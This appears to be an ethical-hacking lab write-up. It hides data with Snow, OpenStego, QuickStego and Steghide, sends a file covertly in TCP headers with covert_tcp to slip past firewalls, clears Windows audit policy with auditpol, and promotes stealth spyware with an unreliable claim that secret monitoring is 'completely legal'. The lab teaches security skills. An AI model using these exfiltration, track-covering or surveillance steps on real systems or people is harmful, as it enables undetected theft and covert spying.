Hiding Data using Steganography

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video.

Network steganography describes all the methods used for transmitting data over a network without it being detected. Several methods for hiding data in a network have been proposed, but the main drawback of most of them is that they do not offer a secondary layer of protection. If steganography to transfer sensitive information out of the target system undetected.

Objectives

  • Use Steganography in Windows and Linux.
  • Using Snow steganography to hide files and data.
  • Hiding files using spaces and tabs.
  • Hide secret text messages in images using OpenStego.

Hiding Data using Snow (Windows)

Snow website: http://darkside.com.au/snow/index.html

Snow is used to conceal messages in ASCII test by appending whitespace to the end of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. Anf if the built-in encryption is used, the message cannot be read even if it is detected.

Snow exploits the steganographic nature of whitespace. Locating trailing whitespace in text is like finding a polar bear in a snow storm, it uses the ICE encryption algorithm, so the name is thematically consistent.

ICE encryption: This encryption algorithm is a 64-bit block cipher. It runs in 1-bit cipher-feedback (CFB) mode, which although inefficient (requiring a full 64-bit encryption for each bit of output).

  • Launch the command prompt and navigate to the Snow folder.

snow-01

  • Create a readme.txt inside the SNOW folder with a random message like: hello world!
  • Now go back to the command prompt and create a secret information
    snow -C -m "My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy" -p "pa55" readme.txt readme2.txt

-m "message": the secret string
pa55: is the password, you can type any password you like.
readme2.txt: is the name of another file which will be created automatically in the same location.

Now the data ("My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy") is hidden inside the readme2.txt file with the contents of the readme.txt.

readme2.txt = readme.txt + "My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy"

You can open both readme.txt and readme2.txt to check if there's any divergences, besides the whitespaces as shown below:

whitespaces-difference

  1.                 To reveal the hidden contents, type:
    snow -C -p "pa55" readme2.txt

snow3


Image Steganography using OpenStego (Windows)

OpenStego is a steganography tool that hides data inside images. OpenStego is a Java-based application and supports password-based encryption of data for additional layer of security. It uses DES algorithm for data encryption, in conjunction with MDS hashing to derive the DES key from the password provided.

OpenStego website: https://www.openstego.com/

  1. Install the OpenStego and Open the application

OpenStego-1

  1. Click on ellipsis button on Message File input and select the text file that contains on the OpenStego folder (This text file contains 'dummy' sensitive information such as VISA and pin numbers).

OpenSTego-2

  1. Next, click on the second ellipsis button (Cover File) and select Island.jpg that also inside the OpenStego folder.

OpenStego-3

  1. Click on the third ellipsis button (Output Stego File), select the Desktop and provide the file name stego.
  2. Now, click Hide Data on the right lower corner.

OpenStego-5

Open the image file on your desktop, you will see only the image but not the contents of the message(text file) embedded in it, as shown below:

OpenStego-6

Obtain the Text file from the Image

  1. Go back to the OpenStego window and click the Extract Data button on the left corner.
  2. Click on the first ellipsis button (Input Stego File), select the image that you generated from Desktop and your Output Folder on the next ellipsis button.

openstego7

  1. Click Extract Data on the right lower corner. This will extract the message file from the image.
  2. The file displays all the information contained in the document, as show below:

openstego8


Using Quick Stego (Windows)

Quick Stego hides text in pictures so that only other users of Quick Stego can retrieve and read the hidden secret messages.

QuickStego website: http://quickcrypto.com/free-steganography-software.html

Hide the text inside the image

  1. Install the Quick Stego.
  2. Launch the Application.

QuickStego-0

  1. Click on Open Image, under Picture, Image, Photo File.
  2. Select the image inside the QuickStego folder. 02_nissan_gt-r_specv_opt.jpg
  3. Next, click on Open Text under Text File, as shown below:

QuickStego-1

  1. Select the text file.txt inside the QuickStego folder.
  2. The selected text will be added in the text box right next to the image, as show below

QuickStego-2

  1. Click on Hide Text under Steganography

QuickStego-3

  1. To save the image file (in which the text is hidden), Click on Save Image, under Picture, Image, Photo File.

The file is now saved as "stego". Though it seems to be a normal image file, it has the text hidden in it, which can be visible by viewing it in Quick Stego.


Hiding Data using Steghide (Kali Linux)

Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files. The color- respectivly sample-frequencies are not changed thus making the embedding resistant against first-order statistical tests.

Official repository: https://github.com/StefanoDeVuono/steghide

Installing Steghide is very simple in Kali Linux, because is already available in Kali Linux repository.

Run the following command:

sudo apt-get update
sudo apt-get install steghide

Hide Text in Image file

  1. Create a folder on your Desktop with an image file and a secret text file.

Kali-Steg-Files-0

  1. To hide the text in image, navigate to the /Desktop/steg/ folder and type:
    steghide embed -cf black-cat.jpg -ef secret-text.txt

    -cf: Cover file < filename >
    -ef: Embedded File < filename >
     

Steg-Kali-command
This command will embed the file secret-text.txt in the cover file black-cat.jpg protected with a passphrase.

Extract text from the Image file

After you have embedded your secret data, the receiver has to use steghide in the following way:

  1. Extract the Data
    steghide extract -sf black-cat.jpg
    -sf: Stego file
  2. Enter the correct passphrase.

KaliStego-2
The contents of the original file secret-text.txt will be extracted from the stego file black-cat.jpg and saved in the current directory.

View Information of Embedded Data

If some file contains embedded data and you want to get some information about it before extracting it, type the command:

Embedded Data

Steghide will then try to extract the embedded data with that passphrase and – if it succeeds – print some information about it.


Honorable Mention

StegoSuite for Linux and Windows is a free and open source steganography tool written in Java.

https://stegosuite.org/

Covert Channels using Cover_TCP

This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host.

Networks use network access control permissions to permit/deny the traffic through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, web proxies to allow certain traffic. Covert channels can be made by inserting data into unused fields of protocol headers. There are many unused or misued fields in TCP or IP over which data can be sent to bypass firewalls.

Covert_TCP

Covert_TCP manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act like a server as well as a client and can be used to hide the data transmitted insied a IP header. This is useful when bypassing firewalls and sending data with legitimate looking packets that contain no data for sniffers to analyze.

Objectives

  • How to carry covert traffic inside of unused fields of TCP and IP headers.

Requisites

  • Windows Server 2016/2012 virtual machine.
  • Kali Linux virtual machine.
  • Ubuntu Linux virtual machine.

Make a Secret Message File

In the Kali Linux, launch a new Terminal window.

  1. Create a folder named send on your Desktop, and navigate into it:
    cd Desktop
    mkdir send
    cd send
  2. Create a text file called message.txt inside send folder containing the string: Secret Message!
    echo "Secret Message!" > message.txt

Compile convert_tcp

  1. Download the covert_tcp.c file on the send folder:
    wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
  2. Compile the convert_tcp.c file:
    cc -o covert_tcp covert_tcp.c
     

covert-compile-1

Make a Receiving Destination

  1. Go to your Ubuntu and open a new Terminal window.
  2. Switch to super-user access: sudo su
  3. Start the tcpdump as shown below:
    tcpdump -nvvX port 8888 -i lo
     

tcp-dump-ubuntu-2

  1. Leave the tcpdump listener running and open another Terminal window or tab.
  2. Go to Desktop and create a folder named receive and navigate into it:
    cd Desktop
    mkdir receive
    cd receive
  3. Download the covert_tcp.c file on the receive folder:
    wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
  4. Compile the convert_tcp.c file:
    cc -o covert_tcp covert_tcp.c

    Note: In case you got some errors about cc command, install the compiler: sudo apt install gcc

Setup a Listener

  1. Start the Listener [Dest=Ubuntu, Source=Kali]:
    ./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 9999 -dest_port 8888 -server -file /home/s4msepi0l/Desktop/receive/receive.txt
     

Ubuntu-tcplistener

Launch Wireshark on Kali

  • Go back to Kali and Launch the Wireshark.

wireshark-kali-1

  • Start the Wireshark capturing, double click on your primary network interface item:

wirehsark-capturing-kali-2

Start Sending the Secret Message

  • Minimize the Wireshark and open a new Terminal window on your Kali, navigate to the send folder.
  • Start sending the contents of message.txt file over TCP.
    /covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt
     

sendsecretmessage


Covert_tcp starts sending the string one character at a time as shown above.
If you switch to the termina window in Ubuntu, you will see the message beign received:
 

receivingsecretmessage

Analyze the Results

  1. On your Ubuntu machine, stop the tcpdump pressing Ctrl+C as shown below:
     

tcpdump-stop

Tcpdump shows that no packets were captured in the network.

  1. Navigate to /Desktop/receive/ and double-click the receive.txt file to view its contents. You will see the full message saved in the file as shown below:
     

secretmessage-kali

  1. Switch back to the Kali and Stop the packet capturing on the Wireshark by clicking on the top-left red switch.
  2. Click on Apply a display filter field and type tcp to view only the TCP packets as show below:
     

apply-display-filter=tcp

If you examine the communication between Ubuntu and Kali (10.0.2.46 - 10.0.2.42) you will find each character of the message string being sent as individual packets over the network show on the next screenshots:

Covert_tcp changes the header of the TCP packets and replaces it with the characters of the string one character at a time to send the message without being detected.

Packet 1, string: S

tcp-1

Packet 2, string: e

tcp-2

Packet 3, string: c

tcp-3

Packet 4, string: r

tcp-4

(...) And so on until the entire message was completed.

Viewing, Enabling and Clearing Audit Policies using Auditpol

Auditpol is a command in Windows Server 2016, 2012 and 2008, and is required for querying or configuring audit policy at the subcategory level.

Auditpol displays the information on the performance and functions to manipulate audit policies.

Microsoft Documentation: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

Objectives

  • How to set the Audit Policies

Requisites

  • Windows Server 2016/2012 virtual machine.

syntax

Command

Description

/set

Sets the audit policy.

/get

Displays the current audit policy.

/backup

Saves the audit policy to a file.

/list

Displays selectable policy elements.

/restore

Restores the audit policy from a file that was previously created by using auditpol/backup.

/remove

Removes all per-user audit policy settings and disables all system audit policy settings.

/clear

Clears the audit policy.

/resourceSACL

Configures global resource system access control lists (SALCs).

To view all the audit policies:

Launch Command Prompt from the Windows Server and type:
auditpol /get /category:*

auditpol-category

To enable the audit policies, type:
auditpol /set /category:"system", "account logon" /success:enable /failure:enable

auditpol-enable

To check whether audit policies are enable, type:
auditpol /get /category:*

auditpol-success-failure

To clear the audit policies, type:
auditpol /clear /y

auditclear

To check wheter audit policies cleared, type:
auditpol /get /category:*

audit-check-clear

 

User System Monitoring and Surveillance using Spytech SpyAgent

spyagent

Spytech SpyAgent is a powerful computer spy software that allows you to monitor everything users do on a computer in total stealth. SpyAgent provides a large array of essential computer monitoring features, such as website, application, and chat-client blocking, lockdown scheduling, and remote delivery of logs via email or FTP.

https://www.spytech-web.com/spyagent.shtml
[Trial/Paid]

Web Activity Monitoring and Recording using Power Spy

powerSpy

Power Spy software allows you to secretly monitor and record all activities on your computer, which is completely legal.

http://ematrixsoft.com/power-spy-software.php
[Trial/Paid]